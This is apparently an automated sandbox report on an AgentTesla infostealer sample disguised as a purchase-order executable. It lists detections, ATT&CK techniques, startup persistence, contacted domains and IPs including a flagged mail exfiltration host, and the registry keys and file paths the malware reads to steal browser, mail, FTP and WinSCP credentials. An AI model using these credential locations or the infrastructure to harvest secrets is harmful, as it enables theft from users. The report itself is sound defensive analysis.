Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 15.2.InstallUtil.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.4018eca.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.408e65a.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.3df4110.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.3db9562.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.3df4110.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.408e65a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.3db9562.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.4018eca.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4659098150.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3704842607.0000000000802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4080631053.0000000003A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4659098150.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2572021121.0000000003FDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4659098150.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2572021121.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Drawing specification and June PO #07329.exe PID: 1372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 6524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5248, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 15.2.InstallUtil.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.4018eca.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.408e65a.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.3df4110.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.3db9562.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.3df4110.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.408e65a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.3db9562.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.4018eca.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.3704842607.0000000000802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4080631053.0000000003A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2572021121.0000000003FDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4659098150.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2572021121.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Drawing specification and June PO #07329.exe PID: 1372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 6524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5248, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 15.2.InstallUtil.exe.800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.4018eca.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.408e65a.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.3df4110.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.3db9562.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.3df4110.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.408e65a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.4053a9a.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.3db9562.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Drawing specification and June PO #07329.exe.4018eca.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.4659098150.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3704842607.0000000000802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4080631053.0000000003A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4659098150.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2572021121.0000000003FDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.4659098150.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2572021121.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Drawing specification and June PO #07329.exe PID: 1372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: file.exe PID: 6524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5928, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5248, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 Valid Accounts	1 Valid Accounts	1 Deobfuscate/Decode Files or Information	1 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	12 Registry Run Keys / Startup Folder	1 Access Token Manipulation	2 Obfuscated Files or Information	1 Credentials in Registry	211 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	311 Process Injection	1 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	1 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	11 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	141 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	311 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Files and Directories	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Drawing specification and June PO #07329.exe	32%	ReversingLabs	Win32.Trojan.Generic
Drawing specification and June PO #07329.exe	100%	Avira	HEUR/AGEN.1311110
Drawing specification and June PO #07329.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	100%	Avira	HEUR/AGEN.1311110
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe	32%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
https://api.ipify.org/	0%	URL Reputation	safe
https://api.ipify.org	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://api.ipify.org/t	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://csp.withgoogle.com/csp/gws/other-hp	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	0%	Avira URL Cloud	safe
http://www.google.com/4v	0%	Avira URL Cloud	safe
https://www.google.com/shopping?hl=en&source=og&tab=wf	0%	Avira URL Cloud	safe
http://www.google.com	0%	Avira URL Cloud	safe
http://mail.privateemail.com	0%	Avira URL Cloud	safe
http://purl.oen	0%	Avira URL Cloud	safe
http://www.google.com/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
mail.privateemail.com	198.54.122.135	true	true	unknown
www.google.com	142.250.74.196	true	false	unknown
api.ipify.org	104.26.12.205	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	URL Reputation: safe	unknown
http://www.google.com/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#	InstallUtil.exe, 0000000E.00000002.4659098150.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4648647647.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4668693776.0000000005BB7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.google.com/4v	file.exe, 0000000C.00000002.4660130188.000000000293C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org	Drawing specification and June PO #07329.exe, 00000000.00000002.2572021121.0000000003FDE000.00000004.00000800.00020000.00000000.sdmp, Drawing specification and June PO #07329.exe, 00000000.00000002.2572021121.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000D.00000002.4080631053.0000000003A81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4659098150.0000000002741000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.3704842607.0000000000802000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/shopping?hl=en&source=og&tab=wf	file.exe, 0000000C.00000002.4660130188.000000000295E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	InstallUtil.exe, 0000000E.00000002.4659098150.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4648647647.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4668693776.0000000005BB7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://account.dyn.com/	Drawing specification and June PO #07329.exe, 00000000.00000002.2572021121.0000000003FDE000.00000004.00000800.00020000.00000000.sdmp, Drawing specification and June PO #07329.exe, 00000000.00000002.2572021121.0000000003DB9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000D.00000002.4080631053.0000000003A81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.3704842607.0000000000802000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	InstallUtil.exe, 0000000E.00000002.4659098150.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4648647647.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4668693776.0000000005BB7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://csp.withgoogle.com/csp/gws/other-hp	Drawing specification and June PO #07329.exe, 00000000.00000002.2566518766.0000000002DDF000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.4660130188.000000000295E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000D.00000002.4062928244.0000000002AAE000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.google.com	Drawing specification and June PO #07329.exe, file.exe.7.dr	false	Avira URL Cloud: safe	unknown
https://api.ipify.org/t	InstallUtil.exe, 0000000E.00000002.4659098150.0000000002741000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://mail.privateemail.com	InstallUtil.exe, 0000000E.00000002.4659098150.00000000027C2000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Drawing specification and June PO #07329.exe, 00000000.00000002.2566518766.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000C.00000002.4660130188.000000000293C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000D.00000002.4062928244.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000002.4659098150.0000000002741000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://purl.oen	file.exe, 0000000C.00000002.4679137122.00000000067F2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
198.54.122.135	mail.privateemail.com	United States	22612	NAMECHEAP-NETUS	true
142.250.74.196	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466179
Start date and time:	2024-07-02 16:38:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Drawing specification and June PO #07329.exe
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.evad.winEXE@17/7@3/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 214 Number of non-executed functions: 10
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Drawing specification and June PO #07329.exe

Simulations

Behavior and APIs

Time	Type	Description
10:39:14	API Interceptor	223x Sleep call for process: Drawing specification and June PO #07329.exe modified
10:40:17	API Interceptor	10x Sleep call for process: PING.EXE modified
10:40:39	API Interceptor	3153182x Sleep call for process: file.exe modified
10:41:53	API Interceptor	25x Sleep call for process: InstallUtil.exe modified
16:39:16	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.lnk
16:40:24	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exe	Get hash	malicious	Conti, PureLog Stealer, Targeted Ransomware	Browse	api.ipify.org/
	482730621.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	482730621.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sonic-Glyder.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe	Get hash	malicious	Bunny Loader	Browse	api.ipify.org/
	lods.cmd	Get hash	malicious	Remcos	Browse	api.ipify.org/
198.54.122.135	Drawing specification and June PO #07329.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	SecuriteInfo.com.MalwareX-gen.30985.17962.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse
	nt4BE6VQLf.exe	Get hash	malicious	AgentTesla	Browse
	img_RFQ CHEM_REF - Aanbesteding - PROJECT 90016288247_pdf.exe	Get hash	malicious	AgentTesla	Browse
	Zam#U00f3w nr 90016288247_ ZNG_1406_MG_2024_004782922.pdf.exe	Get hash	malicious	AgentTesla	Browse
	5302c416b0abd845fe3145f910e82440588c11219940fe89fd68722260a9b508_payload.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win64.PWSX-gen.16698.32595.exe	Get hash	malicious	AgentTesla	Browse
	rSipari__PO408232023_ZNG__stanbul_pdf.exe	Get hash	malicious	AgentTesla	Browse
	50 adet PO #408232023_Web Sitesi #U00dcr#U00fcnleri_pdf.exe	Get hash	malicious	AgentTesla	Browse
	17158441246d37802f97c2611e248b49702f7346b2788831fc8c7e217b8fb1e2cb7dbf2dad677.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mail.privateemail.com	Drawing specification and June PO #07329.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	198.54.122.135
	SecuriteInfo.com.MalwareX-gen.30985.17962.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	198.54.122.135
	nt4BE6VQLf.exe	Get hash	malicious	AgentTesla	Browse	198.54.122.135
	img_RFQ CHEM_REF - Aanbesteding - PROJECT 90016288247_pdf.exe	Get hash	malicious	AgentTesla	Browse	198.54.122.135
	Zam#U00f3w nr 90016288247_ ZNG_1406_MG_2024_004782922.pdf.exe	Get hash	malicious	AgentTesla	Browse	198.54.122.135
	5302c416b0abd845fe3145f910e82440588c11219940fe89fd68722260a9b508_payload.exe	Get hash	malicious	AgentTesla	Browse	198.54.122.135
	SecuriteInfo.com.Win64.PWSX-gen.16698.32595.exe	Get hash	malicious	AgentTesla	Browse	198.54.122.135
	rSipari__PO408232023_ZNG__stanbul_pdf.exe	Get hash	malicious	AgentTesla	Browse	198.54.122.135
	50 adet PO #408232023_Web Sitesi #U00dcr#U00fcnleri_pdf.exe	Get hash	malicious	AgentTesla	Browse	198.54.122.135
	17158441246d37802f97c2611e248b49702f7346b2788831fc8c7e217b8fb1e2cb7dbf2dad677.dat-decoded.exe	Get hash	malicious	AgentTesla	Browse	198.54.122.135
api.ipify.org	llD1w4ROY5.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	arrival notice.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	FmQx1Fw3VA.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	config.lnk.mal.lnk	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	purchase order - PO-011024-201.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	3z5nZg91qJ.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	GuLoader	Browse	172.67.74.152
	DHL AWB COMMERCAIL INVOICE AND TRACKNG DETAILS.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	GuLoader	Browse	104.26.13.205
	https://pub-4d0a115db8fb4f15a6bf3059fadf5ec9.r2.dev/secure_response.html?user-agent=Mozilla/5.0WindowsNT10.0;Win64;x64AppleWebKit/537.36KHTML,likeGeckoChrome/86.0.4240.75Safari/537.36	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://pollyfill.io	Get hash	malicious	Unknown	Browse	104.16.117.116
	https://lnkd.in/e7UhDEpW	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	30Fqen2Bu3.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Complete with Docusign mark.pdf	Get hash	malicious	Unknown	Browse	104.17.2.184
	http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDXjPPos73WSprAyRZ-2Fe35OyRzQCObx6m2J-2BawNrx1Z79t5DvqpoKU1sx90SQ9s1BFTlDy-2BRnvEYaoAECBzgLGytfTSN7FznTwccbM6qJLuUBwrJkCmvLgd8uOOPtKHOCiy6m2fDQJxPXI5uFtOzDGRc-3DScHx_QDM3TkIx9p0DtDeeEp0Z8-2FPcqv0Tvq51yChjKFu-2FB2Toc0JH3IfEt8ayxh9hRhaZappsCk3uGkbJsKvBDyCVHk27C5SeHf-2FrB5syLp7eES4tqFfaea5oHTg4hKblIVwbNxKeRdk6V97FA4a8WTc0qktZ4kjgtBGcuL6n47Dqs5kNCe1kyO9oqq2u-2BdPhrTaYy2E3Tb1wbzdQ4NKkm-2BJWAw-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://beta.slimwiki.com/share/4c231ba1-3080-47e5-bea1-ba3ed25fb9a4	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	s8Z4L8DY65.exe	Get hash	malicious	XWorm	Browse	104.20.4.235
	30Fqen2Bu3.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
